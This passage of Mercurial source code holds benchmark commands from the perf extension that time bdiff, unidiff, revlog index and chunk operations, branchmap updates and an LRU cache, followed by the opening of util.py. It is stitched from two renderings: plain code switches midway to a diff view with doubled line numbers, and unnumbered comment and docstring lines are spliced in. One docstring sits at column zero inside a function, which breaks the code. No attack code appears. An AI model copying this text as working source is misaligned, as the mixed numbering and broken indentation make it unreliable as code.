    tr.addbackup(b'fncache')
    def d():
        s.fncache._dirty = True
        s.fncache.write(tr)
    timer(d)
    tr.close()
    lock.release()
    fm.end()

@command(b'perffncacheencode', formatteropts)
def perffncacheencode(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    s = repo.store
    s.fncache._load()
    def d():
        for p in s.fncache.entries:
            s.encode(p)
    timer(d)
    fm.end()

def _bdiffworker(q, blocks, xdiff, ready, done):
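    # worker protocol: consume text pairs until a None sentinel arrives,
    # then park on the 'ready' condition until the main thread re-arms the
    # queue for another run or sets 'done' to request shutdown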
    while not done.is_set():
        pair = q.get()
        while pair is not None:
            if xdiff:
                mdiff.bdiff.xdiffblocks(*pair)
            elif blocks:
                mdiff.bdiff.blocks(*pair)
            else:
                mdiff.textdiff(*pair)
            q.task_done()
            pair = q.get()
        q.task_done() # for the None one
        with ready:
            ready.wait()

def _manifestrevision(repo, mnode):
    ml = repo.manifestlog

    if util.safehasattr(ml, b'getstorage'):
        store = ml.getstorage(b'')
    else:
        store = ml._revlog

    return store.revision(mnode)

@command(b'perfbdiff', revlogopts + formatteropts + [
    (b'', b'count', 1, b'number of revisions to test (when using --startrev)'),
    (b'', b'alldata', False, b'test bdiffs for all associated revisions'),
    (b'', b'threads', 0, b'number of threads to use (disable with 0)'),
    (b'', b'blocks', False, b'test computing diffs into blocks'),
    (b'', b'xdiff', False, b'use xdiff algorithm'),
    ],
    b'-c|-m|FILE REV')
def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
    """benchmark a bdiff between revisions

    By default, benchmark a bdiff between its delta parent and itself.

    With ``--count``, benchmark bdiffs between delta parents and self for N
    revisions starting at the specified revision.

    With ``--alldata``, assume the requested revision is a changeset and
    measure bdiffs for all changes related to that changeset (manifest
    and filelogs).
    """
    opts = pycompat.byteskwargs(opts)

    if opts[b'xdiff'] and not opts[b'blocks']:
        raise error.CommandError(b'perfbdiff', b'--xdiff requires --blocks')

    if opts[b'alldata']:
        opts[b'changelog'] = True

    if opts.get(b'changelog') or opts.get(b'manifest'):
        file_, rev = None, file_
    elif rev is None:
        raise error.CommandError(b'perfbdiff', b'invalid arguments')

    blocks = opts[b'blocks']
    xdiff = opts[b'xdiff']
    textpairs = []

    r = cmdutil.openrevlog(repo, b'perfbdiff', file_, opts)

    startrev = r.rev(r.lookup(rev))
    for rev in range(startrev, min(startrev + count, len(r) - 1)):
        if opts[b'alldata']:
            # Load revisions associated with changeset.
            ctx = repo[rev]
            mtext = _manifestrevision(repo, ctx.manifestnode())
            for pctx in ctx.parents():
                pman = _manifestrevision(repo, pctx.manifestnode())
                textpairs.append((pman, mtext))

            # Load filelog revisions by iterating manifest delta.
            man = ctx.manifest()
            pman = ctx.p1().manifest()
            for filename, change in pman.diff(man).items():
                fctx = repo.file(filename)
                f1 = fctx.revision(change[0][0] or -1)
                f2 = fctx.revision(change[1][0] or -1)
                textpairs.append((f1, f2))
        else:
            dp = r.deltaparent(rev)
            textpairs.append((r.revision(dp), r.revision(rev)))

    withthreads = threads > 0
    if not withthreads:
        def d():
            for pair in textpairs:
                if xdiff:
                    mdiff.bdiff.xdiffblocks(*pair)
                elif blocks:
                    mdiff.bdiff.blocks(*pair)
                else:
                    mdiff.textdiff(*pair)
    else:
        q = queue()
        for i in xrange(threads):
            q.put(None)
        ready = threading.Condition()
        done = threading.Event()
        for i in xrange(threads):
            threading.Thread(target=_bdiffworker,
                             args=(q, blocks, xdiff, ready, done)).start()
        q.join()
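        # each worker consumes one None from the queue and then parks on
        # 'ready'; join() returns once all threads are parked, keeping
        # thread startup cost out of the timed section below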
        def d():
            for pair in textpairs:
                q.put(pair)
            for i in xrange(threads):
                q.put(None)
            with ready:
                ready.notify_all()
            q.join()
    timer, fm = gettimer(ui, opts)
    timer(d)
    fm.end()

    if withthreads:
        done.set()
        for i in xrange(threads):
            q.put(None)
        with ready:
            ready.notify_all()

@command(b'perfunidiff', revlogopts + formatteropts + [
    (b'', b'count', 1, b'number of revisions to test (when using --startrev)'),
    (b'', b'alldata', False, b'test unidiffs for all associated revisions'),
    ], b'-c|-m|FILE REV')
def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
    """benchmark a unified diff between revisions

    This doesn't include any copy tracing - it's just a unified diff
    of the texts.

    By default, benchmark a diff between its delta parent and itself.

    With ``--count``, benchmark diffs between delta parents and self for N
    revisions starting at the specified revision.

    With ``--alldata``, assume the requested revision is a changeset and
    measure diffs for all changes related to that changeset (manifest
    and filelogs).
    """
    if opts[b'alldata']:
        opts[b'changelog'] = True

    if opts.get(b'changelog') or opts.get(b'manifest'):
        file_, rev = None, file_
    elif rev is None:
        raise error.CommandError(b'perfunidiff', b'invalid arguments')

    textpairs = []

    r = cmdutil.openrevlog(repo, b'perfunidiff', file_, opts)

    startrev = r.rev(r.lookup(rev))
    for rev in range(startrev, min(startrev + count, len(r) - 1)):
        if opts[b'alldata']:
            # Load revisions associated with changeset.
            ctx = repo[rev]
            mtext = _manifestrevision(repo, ctx.manifestnode())
            for pctx in ctx.parents():
                pman = _manifestrevision(repo, pctx.manifestnode())
                textpairs.append((pman, mtext))

            # Load filelog revisions by iterating manifest delta.
            man = ctx.manifest()
            pman = ctx.p1().manifest()
            for filename, change in pman.diff(man).items():
                fctx = repo.file(filename)
                f1 = fctx.revision(change[0][0] or -1)
                f2 = fctx.revision(change[1][0] or -1)
                textpairs.append((f1, f2))
        else:
            dp = r.deltaparent(rev)
            textpairs.append((r.revision(dp), r.revision(rev)))

    def d():
        for left, right in textpairs:
            # The date strings don't matter, so we pass empty strings.
            headerlines, hunks = mdiff.unidiff(
                left, b'', right, b'', b'left', b'right', binary=False)
            # consume iterators in roughly the way patch.py does
            b'\n'.join(headerlines)
            b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
    timer, fm = gettimer(ui, opts)
    timer(d)
    fm.end()

@command(b'perfdiffwd', formatteropts)
def perfdiffwd(ui, repo, **opts):
    """Profile diff of working directory changes"""
    timer, fm = gettimer(ui, opts)
    options = {
        b'w': b'ignore_all_space',
        b'b': b'ignore_space_change',
        b'B': b'ignore_blank_lines',
        }

    for diffopt in (b'', b'w', b'b', b'B', b'wB'):
        opts = dict((options[c], b'1') for c in diffopt)
        def d():
            ui.pushbuffer()
            commands.diff(ui, repo, **opts)
            ui.popbuffer()
        title = b'diffopts: %s' % (diffopt and (b'-' + diffopt) or b'none')
        timer(d, title)
    fm.end()

@command(b'perfrevlogindex', revlogopts + formatteropts,
         b'-c|-m|FILE')
def perfrevlogindex(ui, repo, file_=None, **opts):
    """Benchmark operations against a revlog index.

    This tests constructing a revlog instance, reading index data,
    parsing index data, and performing various operations related to
    index data.
    """

    rl = cmdutil.openrevlog(repo, b'perfrevlogindex', file_, opts)

    opener = getattr(rl, 'opener') # trick linter
    indexfile = rl.indexfile
    data = opener.read(indexfile)

    header = struct.unpack(b'>I', data[0:4])[0]
    version = header & 0xFFFF
    if version == 1:
        revlogio = revlog.revlogio()
        inline = header & (1 << 16)
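        # (revlog v1 packs the format version into the low 16 bits of the
        # first big-endian 32-bit word and the inline-data flag at bit 16)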
    else:
        raise error.Abort((b'unsupported revlog version: %d') % version)

    rllen = len(rl)

    node0 = rl.node(0)
    node25 = rl.node(rllen // 4)
    node50 = rl.node(rllen // 2)
    node75 = rl.node(rllen // 4 * 3)
    node100 = rl.node(rllen - 1)
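    # sampling nodes at 0%, 25%, 50%, 75% and 100% of the index exposes any
    # position-dependent lookup cost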

    allrevs = range(rllen)
    allrevsrev = list(reversed(allrevs))
    allnodes = [rl.node(rev) for rev in range(rllen)]
    allnodesrev = list(reversed(allnodes))

    def constructor():
        revlog.revlog(opener, indexfile)

    def read():
        with opener(indexfile) as fh:
            fh.read()

    def parseindex():
        revlogio.parseindex(data, inline)

    def getentry(revornode):
        index = revlogio.parseindex(data, inline)[0]
        index[revornode]

    def getentries(revs, count=1):
        index = revlogio.parseindex(data, inline)[0]

        for i in range(count):
            for rev in revs:
                index[rev]

    def resolvenode(node):
        nodemap = revlogio.parseindex(data, inline)[1]
        # This only works for the C code.
        if nodemap is None:
            return

        try:
            nodemap[node]
        except error.RevlogError:
            pass

    def resolvenodes(nodes, count=1):
        nodemap = revlogio.parseindex(data, inline)[1]
        if nodemap is None:
            return

        for i in range(count):
            for node in nodes:
                try:
                    nodemap[node]
                except error.RevlogError:
                    pass

    benches = [
        (constructor, b'revlog constructor'),
        (read, b'read'),
        (parseindex, b'create index object'),
        (lambda: getentry(0), b'retrieve index entry for rev 0'),
        (lambda: resolvenode(b'a' * 20), b'look up missing node'),
        (lambda: resolvenode(node0), b'look up node at rev 0'),
        (lambda: resolvenode(node25), b'look up node at 1/4 len'),
        (lambda: resolvenode(node50), b'look up node at 1/2 len'),
        (lambda: resolvenode(node75), b'look up node at 3/4 len'),
        (lambda: resolvenode(node100), b'look up node at tip'),
        # 2x variation is to measure caching impact.
        (lambda: resolvenodes(allnodes),
         b'look up all nodes (forward)'),
        (lambda: resolvenodes(allnodes, 2),
         b'look up all nodes 2x (forward)'),
        (lambda: resolvenodes(allnodesrev),
         b'look up all nodes (reverse)'),
        (lambda: resolvenodes(allnodesrev, 2),
         b'look up all nodes 2x (reverse)'),
        (lambda: getentries(allrevs),
         b'retrieve all index entries (forward)'),
        (lambda: getentries(allrevs, 2),
         b'retrieve all index entries 2x (forward)'),
        (lambda: getentries(allrevsrev),
         b'retrieve all index entries (reverse)'),
        (lambda: getentries(allrevsrev, 2),
         b'retrieve all index entries 2x (reverse)'),
    ]

    for fn, title in benches:
        timer, fm = gettimer(ui, opts)
        timer(fn, title=title)
        fm.end()

@command(b'perfrevlogrevisions', revlogopts + formatteropts +
         [(b'd', b'dist', 100, b'distance between the revisions'),
          (b's', b'startrev', 0, b'revision to start reading at'),
          (b'', b'reverse', False, b'read in reverse')],
         b'-c|-m|FILE')
def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
                        **opts):
    """Benchmark reading a series of revisions from a revlog.

    By default, we read every ``-d/--dist`` revision from 0 to tip of
    the specified revlog.

    The start revision can be defined via ``-s/--startrev``.
    """
    rl = cmdutil.openrevlog(repo, b'perfrevlogrevisions', file_, opts)
    rllen = getlen(ui)(rl)

    def d():
        rl.clearcaches()

        beginrev = startrev
        endrev = rllen
        dist = opts[b'dist']

        if reverse:
            beginrev, endrev = endrev, beginrev
            dist = -1 * dist

        for x in xrange(beginrev, endrev, dist):
            # Old revisions don't support passing int.
            n = rl.node(x)
            rl.revision(n)

    timer, fm = gettimer(ui, opts)
    timer(d)
    fm.end()

@command(b'perfrevlogchunks', revlogopts + formatteropts +
         [(b'e', b'engines', b'', b'compression engines to use'),
          (b's', b'startrev', 0, b'revision to start at')],
         b'-c|-m|FILE')
def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
    """Benchmark operations on revlog chunks.

    Logically, each revlog is a collection of fulltext revisions. However,
    stored within each revlog are "chunks" of possibly compressed data. This
    data needs to be read and decompressed or compressed and written.

    This command measures the time it takes to read+decompress and recompress
    chunks in a revlog. It effectively isolates I/O and compression
    performance. For measurements of higher-level operations like resolving
    revisions, see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
    """
    rl = cmdutil.openrevlog(repo, b'perfrevlogchunks', file_, opts)

    # _chunkraw was renamed to _getsegmentforrevs.
    try:
        segmentforrevs = rl._getsegmentforrevs
    except AttributeError:
        segmentforrevs = rl._chunkraw

    # Verify engines argument.
    if engines:
        engines = set(e.strip() for e in engines.split(b','))
        for engine in engines:
            try:
                util.compressionengines[engine]
            except KeyError:
                raise error.Abort(b'unknown compression engine: %s' % engine)
    else:
        engines = []
        for e in util.compengines:
            engine = util.compengines[e]
            try:
                if engine.available():
                    engine.revlogcompressor().compress(b'dummy')
                    engines.append(e)
            except NotImplementedError:
                pass

    revs = list(rl.revs(startrev, len(rl) - 1))

    def rlfh(rl):
        if rl._inline:
            return getsvfs(repo)(rl.indexfile)
        else:
            return getsvfs(repo)(rl.datafile)

    def doread():
        rl.clearcaches()
        for rev in revs:
            segmentforrevs(rev, rev)

    def doreadcachedfh():
        rl.clearcaches()
        fh = rlfh(rl)
        for rev in revs:
            segmentforrevs(rev, rev, df=fh)

    def doreadbatch():
        rl.clearcaches()
        segmentforrevs(revs[0], revs[-1])

    def doreadbatchcachedfh():
        rl.clearcaches()
        fh = rlfh(rl)
        segmentforrevs(revs[0], revs[-1], df=fh)

    def dochunk():
        rl.clearcaches()
        fh = rlfh(rl)
        for rev in revs:
            rl._chunk(rev, df=fh)

    chunks = [None]
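    # a one-element list lets the closure below swap in its result without
    # 'nonlocal', which Python 2 lacks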

    def dochunkbatch():
        rl.clearcaches()
        fh = rlfh(rl)
        # Save chunks as a side-effect.
        chunks[0] = rl._chunks(revs, df=fh)

    def docompress(compressor):
        rl.clearcaches()

        try:
            # Swap in the requested compression engine.
            oldcompressor = rl._compressor
            rl._compressor = compressor
            for chunk in chunks[0]:
                rl.compress(chunk)
        finally:
            rl._compressor = oldcompressor

    benches = [
        (lambda: doread(), b'read'),
        (lambda: doreadcachedfh(), b'read w/ reused fd'),
        (lambda: doreadbatch(), b'read batch'),
        (lambda: doreadbatchcachedfh(), b'read batch w/ reused fd'),
        (lambda: dochunk(), b'chunk'),
        (lambda: dochunkbatch(), b'chunk batch'),
    ]

    for engine in sorted(engines):
        compressor = util.compengines[engine].revlogcompressor()
        benches.append((functools.partial(docompress, compressor),
                        b'compress w/ %s' % engine))

    for fn, title in benches:
        timer, fm = gettimer(ui, opts)
        timer(fn, title=title)
        fm.end()

@command(b'perfrevlogrevision', revlogopts + formatteropts +
         [(b'', b'cache', False, b'use caches instead of clearing')],
         b'-c|-m|FILE REV')
def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
    """Benchmark obtaining a revlog revision.

    Obtaining a revlog revision consists of roughly the following steps:

    1. Compute the delta chain
    2. Obtain the raw chunks for that delta chain
    3. Decompress each raw chunk
    4. Apply binary patches to obtain fulltext
    5. Verify hash of fulltext

    This command measures the time spent in each of these phases.
    """
    if opts.get(b'changelog') or opts.get(b'manifest'):
        file_, rev = None, file_
    elif rev is None:
        raise error.CommandError(b'perfrevlogrevision', b'invalid arguments')

    r = cmdutil.openrevlog(repo, b'perfrevlogrevision', file_, opts)

    # _chunkraw was renamed to _getsegmentforrevs.
    try:
        segmentforrevs = r._getsegmentforrevs
    except AttributeError:
        segmentforrevs = r._chunkraw

    node = r.lookup(rev)
    rev = r.rev(node)

    def getrawchunks(data, chain):
        start = r.start
        length = r.length
        inline = r._inline
        iosize = r._io.size
        buffer = util.buffer
        offset = start(chain[0])

        chunks = []
        ladd = chunks.append

        for rev in chain:
            chunkstart = start(rev)
            if inline:
                chunkstart += (rev + 1) * iosize
            chunklength = length(rev)
            ladd(buffer(data, chunkstart - offset, chunklength))

        return chunks

    def dodeltachain(rev):
        if not cache:
            r.clearcaches()
        r._deltachain(rev)

    def doread(chain):
        if not cache:
            r.clearcaches()
        segmentforrevs(chain[0], chain[-1])

    def dorawchunks(data, chain):
        if not cache:
            r.clearcaches()
        getrawchunks(data, chain)

    def dodecompress(chunks):
        decomp = r.decompress
        for chunk in chunks:
            decomp(chunk)

    def dopatch(text, bins):
        if not cache:
            r.clearcaches()
        mdiff.patches(text, bins)

    def dohash(text):
        if not cache:
            r.clearcaches()
        r.checkhash(text, node, rev=rev)

    def dorevision():
        if not cache:
            r.clearcaches()
        r.revision(node)

    chain = r._deltachain(rev)[0]
    data = segmentforrevs(chain[0], chain[-1])[1]
    rawchunks = getrawchunks(data, chain)
    bins = r._chunks(chain)
    text = str(bins[0])
    bins = bins[1:]
    text = mdiff.patches(text, bins)
1690 1690
1691 1691 benches = [
1692 1692 (lambda: dorevision(), b'full'),
1693 1693 (lambda: dodeltachain(rev), b'deltachain'),
1694 1694 (lambda: doread(chain), b'read'),
1695 1695 (lambda: dorawchunks(data, chain), b'rawchunks'),
1696 1696 (lambda: dodecompress(rawchunks), b'decompress'),
1697 1697 (lambda: dopatch(text, bins), b'patch'),
1698 1698 (lambda: dohash(text), b'hash'),
1699 1699 ]
1700 1700
1701 1701 for fn, title in benches:
1702 1702 timer, fm = gettimer(ui, opts)
1703 1703 timer(fn, title=title)
1704 1704 fm.end()
1705 1705
1706 1706 @command(b'perfrevset',
1707 1707 [(b'C', b'clear', False, b'clear volatile cache between each call.'),
1708 1708 (b'', b'contexts', False, b'obtain changectx for each revision')]
1709 1709 + formatteropts, b"REVSET")
1710 1710 def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
1711 1711 """benchmark the execution time of a revset
1712 1712
1713 1713 Use the --clear option if you need to evaluate the impact of rebuilding
1714 1714 the volatile revision set caches on the revset execution. The volatile
1715 1715 caches hold filtered and obsolescence related data."""
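# An illustrative invocation (any revset expression works; --clear and
# --contexts exercise the volatile cache and changectx paths):
#   hg perfrevset 'all()' --clear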
1716 1716 timer, fm = gettimer(ui, opts)
1717 1717 def d():
1718 1718 if clear:
1719 1719 repo.invalidatevolatilesets()
1720 1720 if contexts:
1721 1721 for ctx in repo.set(expr): pass
1722 1722 else:
1723 1723 for r in repo.revs(expr): pass
1724 1724 timer(d)
1725 1725 fm.end()
1726 1726
1727 1727 @command(b'perfvolatilesets',
1728 1728 [(b'', b'clear-obsstore', False, b'drop obsstore between each call.'),
1729 1729 ] + formatteropts)
1730 1730 def perfvolatilesets(ui, repo, *names, **opts):
1731 1731 """benchmark the computation of various volatile sets
1732 1732
1733 1733 Volatile sets compute elements related to filtering and obsolescence."""
1734 1734 timer, fm = gettimer(ui, opts)
1735 1735 repo = repo.unfiltered()
1736 1736
1737 1737 def getobs(name):
1738 1738 def d():
1739 1739 repo.invalidatevolatilesets()
1740 1740 if opts[b'clear_obsstore']:
1741 1741 clearfilecache(repo, b'obsstore')
1742 1742 obsolete.getrevs(repo, name)
1743 1743 return d
1744 1744
1745 1745 allobs = sorted(obsolete.cachefuncs)
1746 1746 if names:
1747 1747 allobs = [n for n in allobs if n in names]
1748 1748
1749 1749 for name in allobs:
1750 1750 timer(getobs(name), title=name)
1751 1751
1752 1752 def getfiltered(name):
1753 1753 def d():
1754 1754 repo.invalidatevolatilesets()
1755 1755 if opts[b'clear_obsstore']:
1756 1756 clearfilecache(repo, b'obsstore')
1757 1757 repoview.filterrevs(repo, name)
1758 1758 return d
1759 1759
1760 1760 allfilter = sorted(repoview.filtertable)
1761 1761 if names:
1762 1762 allfilter = [n for n in allfilter if n in names]
1763 1763
1764 1764 for name in allfilter:
1765 1765 timer(getfiltered(name), title=name)
1766 1766 fm.end()
1767 1767
1768 1768 @command(b'perfbranchmap',
1769 1769 [(b'f', b'full', False,
1770 1770 b'include build time of subsets'),
1771 1771 (b'', b'clear-revbranch', False,
1772 1772 b'purge the revbranch cache between computation'),
1773 1773 ] + formatteropts)
1774 1774 def perfbranchmap(ui, repo, *filternames, **opts):
1775 1775 """benchmark the update of a branchmap
1776 1776
1777 1777 This benchmarks the full repo.branchmap() call with read and write disabled
1778 1778 """
1779 1779 full = opts.get(b"full", False)
1780 1780 clear_revbranch = opts.get(b"clear_revbranch", False)
1781 1781 timer, fm = gettimer(ui, opts)
1782 1782 def getbranchmap(filtername):
1783 1783 """generate a benchmark function for the filtername"""
1784 1784 if filtername is None:
1785 1785 view = repo
1786 1786 else:
1787 1787 view = repo.filtered(filtername)
1788 1788 def d():
1789 1789 if clear_revbranch:
1790 1790 repo.revbranchcache()._clear()
1791 1791 if full:
1792 1792 view._branchcaches.clear()
1793 1793 else:
1794 1794 view._branchcaches.pop(filtername, None)
1795 1795 view.branchmap()
1796 1796 return d
1797 1797 # add filters from smaller subsets to bigger subsets
1798 1798 possiblefilters = set(repoview.filtertable)
1799 1799 if filternames:
1800 1800 possiblefilters &= set(filternames)
1801 1801 subsettable = getbranchmapsubsettable()
1802 1802 allfilters = []
1803 1803 while possiblefilters:
1804 1804 for name in possiblefilters:
1805 1805 subset = subsettable.get(name)
1806 1806 if subset not in possiblefilters:
1807 1807 break
1808 1808 else:
1809 1809 assert False, b'subset cycle %s!' % possiblefilters
1810 1810 allfilters.append(name)
1811 1811 possiblefilters.remove(name)
1812 1812
1813 1813 # warm the cache
1814 1814 if not full:
1815 1815 for name in allfilters:
1816 1816 repo.filtered(name).branchmap()
1817 1817 if not filternames or b'unfiltered' in filternames:
1818 1818 # add unfiltered
1819 1819 allfilters.append(None)
1820 1820
1821 1821 branchcacheread = safeattrsetter(branchmap, b'read')
1822 1822 branchcachewrite = safeattrsetter(branchmap.branchcache, b'write')
1823 1823 branchcacheread.set(lambda repo: None)
1824 1824 branchcachewrite.set(lambda bc, repo: None)
1825 1825 try:
1826 1826 for name in allfilters:
1827 1827 printname = name
1828 1828 if name is None:
1829 1829 printname = b'unfiltered'
1830 1830 timer(getbranchmap(name), title=str(printname))
1831 1831 finally:
1832 1832 branchcacheread.restore()
1833 1833 branchcachewrite.restore()
1834 1834 fm.end()
1835 1835
1836 1836 @command(b'perfbranchmapload', [
1837 1837 (b'f', b'filter', b'', b'Specify repoview filter'),
1838 1838 (b'', b'list', False, b'List branchmap filter caches'),
1839 1839 ] + formatteropts)
1840 1840 def perfbranchmapread(ui, repo, filter=b'', list=False, **opts):
1841 1841 """benchmark reading the branchmap"""
1842 1842 if list:
1843 1843 for name, kind, st in repo.cachevfs.readdir(stat=True):
1844 1844 if name.startswith(b'branch2'):
1845 1845 filtername = name.partition(b'-')[2] or b'unfiltered'
1846 1846 ui.status(b'%s - %s\n'
1847 1847 % (filtername, util.bytecount(st.st_size)))
1848 1848 return
1849 1849 if filter:
1850 1850 repo = repoview.repoview(repo, filter)
1851 1851 else:
1852 1852 repo = repo.unfiltered()
1853 1853 # try once without timer, the filter may not be cached
1854 1854 if branchmap.read(repo) is None:
1855 1855 raise error.Abort(b'No branchmap cached for %s repo'
1856 1856 % (filter or b'unfiltered'))
1857 1857 timer, fm = gettimer(ui, opts)
1858 1858 timer(lambda: branchmap.read(repo) and None)
1859 1859 fm.end()
1860 1860
1861 1861 @command(b'perfloadmarkers')
1862 1862 def perfloadmarkers(ui, repo):
1863 1863 """benchmark the time to parse the on-disk markers for a repo
1864 1864
1865 1865 Result is the number of markers in the repo."""
1866 1866 timer, fm = gettimer(ui)
1867 1867 svfs = getsvfs(repo)
1868 1868 timer(lambda: len(obsolete.obsstore(svfs)))
1869 1869 fm.end()
1870 1870
1871 1871 @command(b'perflrucachedict', formatteropts +
1872 1872 [(b'', b'size', 4, b'size of cache'),
1873 1873 (b'', b'gets', 10000, b'number of key lookups'),
1874 1874 (b'', b'sets', 10000, b'number of key sets'),
1875 1875 (b'', b'mixed', 10000, b'number of mixed mode operations'),
1876 1876 (b'', b'mixedgetfreq', 50, b'frequency of get vs set ops in mixed mode')],
1877 1877 norepo=True)
1878 1878 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1879 1879 mixedgetfreq=50, **opts):
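"""Benchmark the lrucachedict implementation.

The benchmark covers initialization, gets without eviction, inserts and
sets with eviction, and a mixed get/set workload."""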
1880 1880 def doinit():
1881 1881 for i in xrange(10000):
1882 1882 util.lrucachedict(size)
1883 1883
1884 1884 values = []
1885 1885 for i in xrange(size):
1886 1886 values.append(random.randint(0, sys.maxint))
1887 1887
1888 1888 # Get mode fills the cache and tests raw lookup performance with no
1889 1889 # eviction.
1890 1890 getseq = []
1891 1891 for i in xrange(gets):
1892 1892 getseq.append(random.choice(values))
1893 1893
1894 1894 def dogets():
1895 1895 d = util.lrucachedict(size)
1896 1896 for v in values:
1897 1897 d[v] = v
1898 1898 for key in getseq:
1899 1899 value = d[key]
1900 1900 value # silence pyflakes warning
1901 1901
1902 1902 # Set mode tests insertion speed with cache eviction.
1903 1903 setseq = []
1904 1904 for i in xrange(sets):
1905 1905 setseq.append(random.randint(0, sys.maxint))
1906 1906
1907 def doinserts():
1908 d = util.lrucachedict(size)
1909 for v in setseq:
1910 d.insert(v, v)
1911
1907 1912 def dosets():
1908 1913 d = util.lrucachedict(size)
1909 1914 for v in setseq:
1910 1915 d[v] = v
1911 1916
1912 1917 # Mixed mode randomly performs gets and sets with eviction.
1913 1918 mixedops = []
1914 1919 for i in xrange(mixed):
1915 1920 r = random.randint(0, 100)
1916 1921 if r < mixedgetfreq:
1917 1922 op = 0
1918 1923 else:
1919 1924 op = 1
1920 1925
1921 1926 mixedops.append((op, random.randint(0, size * 2)))
1922 1927
1923 1928 def domixed():
1924 1929 d = util.lrucachedict(size)
1925 1930
1926 1931 for op, v in mixedops:
1927 1932 if op == 0:
1928 1933 try:
1929 1934 d[v]
1930 1935 except KeyError:
1931 1936 pass
1932 1937 else:
1933 1938 d[v] = v
1934 1939
1935 1940 benches = [
1936 1941 (doinit, b'init'),
1937 1942 (dogets, b'gets'),
1943 (doinserts, b'inserts'),
1938 1944 (dosets, b'sets'),
1939 1945 (domixed, b'mixed')
1940 1946 ]
1941 1947
1942 1948 for fn, title in benches:
1943 1949 timer, fm = gettimer(ui, opts)
1944 1950 timer(fn, title=title)
1945 1951 fm.end()
1946 1952
1947 1953 @command(b'perfwrite', formatteropts)
1948 1954 def perfwrite(ui, repo, **opts):
1949 1955 """microbenchmark ui.write
1950 1956 """
1951 1957 timer, fm = gettimer(ui, opts)
1952 1958 def write():
1953 1959 for i in range(100000):
1954 1960 ui.write((b'Testing write performance\n'))
1955 1961 timer(write)
1956 1962 fm.end()
1957 1963
1958 1964 def uisetup(ui):
1959 1965 if (util.safehasattr(cmdutil, b'openrevlog') and
1960 1966 not util.safehasattr(commands, b'debugrevlogopts')):
1961 1967 # for "historical portability":
1962 1968 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1963 1969 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1964 1970 # openrevlog() should cause failure, because it has been
1965 1971 # available since 3.5 (or 49c583ca48c4).
1966 1972 def openrevlog(orig, repo, cmd, file_, opts):
1967 1973 if opts.get(b'dir') and not util.safehasattr(repo, b'dirlog'):
1968 1974 raise error.Abort(b"This version doesn't support --dir option",
1969 1975 hint=b"use 3.5 or later")
1970 1976 return orig(repo, cmd, file_, opts)
1971 1977 extensions.wrapfunction(cmdutil, b'openrevlog', openrevlog)
@@ -1,3920 +1,3941 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
